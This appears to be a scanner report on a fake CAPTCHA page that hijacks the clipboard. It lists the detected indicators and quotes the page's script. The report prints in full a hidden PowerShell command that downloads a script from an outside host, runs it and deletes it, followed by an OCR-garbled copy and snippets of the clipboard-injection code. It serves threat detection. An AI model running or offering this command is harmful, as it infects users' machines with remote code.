window.innerWidth - 10) { verifyWindow.style.left = checkboxWindow.offsetLeft - 8 + "px"; } else { verifyWindowArrow.style.top = checkboxWindow.offsetTop + 24 + "px"; verifyWindowArrow.style.left = checkboxWindow.offsetLeft + 45 + "px"; verifyWindowArrow.style.visibility = "visible"; verifyWindowArrow.style.opacity = "1"; } } function closeVerifyWindow() { verifyWindow.style.display = "none"; verifyWindow.style.visibility = "hidden"; verifyWindow.style.opacity = "0"; verifyWindowArrow.style.visibility = "hidden"; verifyWindowArrow.style.opacity = "0"; showCaptchaCheckbox(); hideCaptchaLoading(); checkboxBtn.disabled = false; verifyBtn.disabled = false; } function isVerifyWindowVisible() { return verifyWindow.style.display !== "none" && verifyWindow.style.display !== ""; } function copyToClipboard() { navigator.clipboard.writeText...
https://162.215.130.152/
73 indicators detected
Score: 618 PowerShell Clipboard Hijack
2
powershell
6
clipboard
3
captcha
2
base64
21
suspicious keywords
2
high risk

πŸ’» PowerShell Commands 2

powershell -w h -ep Bypass -nop -c "$d='p.ps1';$y=$env:USERPROFILE+'\\\\Downloads\\\\'+$d;Start-Sleep 15;(New-Object Net.WebClient).DownloadFile('https://ghost.nestdns.com/files', $y);& $y;Remove-Item $y -Force;"`;
New-Object

πŸ” Suspicious Keywords 21

cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\\\Downioads\\\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;"`;
command = `cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\\\Downioads\\\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;"`;
CAPTCHA Verification
Verification ID
verification id
Ray ID
ray id
I am not a robot
Robot
robot

🌐 Extracted URLs 5

https://i.postimg.cc/k4zrz92z/111.png
https://ghost.nestdns.com/files
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent
https://${host}/favicon.ico`

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...

Showing top 20 malicious sites. 30 additional sites detected.